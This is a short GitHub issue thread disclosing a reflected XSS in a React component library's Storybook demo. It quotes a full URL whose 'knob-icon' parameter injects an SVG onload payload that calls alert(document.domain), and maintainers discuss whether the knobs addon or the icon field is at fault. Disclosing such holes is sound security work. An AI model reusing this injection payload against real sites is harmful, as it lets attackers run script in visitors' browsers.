### ISSUE TITLE
XSS in storybook notification knobs icon field

### ISSUE THREAD

**Issue by florian-interaktiv** [mashmatrix/react-lightning-design-system#189]
Found an xss in your storybook:

[https://mashmatrix.github.io/react-lightning-design-system/?knob-icon=H%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3B%3E&knob-type=alert&knob-notificationText=This%20is%20notification%20text.&knob-alertTexture=true&selectedKind=Notification&selectedStory=Controlled%20with%20knobs&full=0&down=1&left=1&panelRight=0&downPanel=kadirahq%2Fstorybook-addon-knobs](https://mashmatrix.github.io/react-lightning-design-system/?knob-icon=H%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3B%3E&knob-type=alert&knob-notificationText=This%20is%20notification%20text.&knob-alertTexture=true&selectedKind=Notification&selectedStory=Controlled%20with%20knobs&full=0&down=1&left=1&panelRight=0&downPanel=kadirahq%2Fstorybook-addon-knobs)

The content of "knob-icon" param is not being sanitized ;)

**Comment by bondz** [comment]
@stomita

**Comment by john-benson** [comment]
This would probably be an issue with the knobs extension itself.

**Comment by stomita** [comment]
This could be basically knob's issue, but the icon should also be prevented from accepting arbitrary chars.
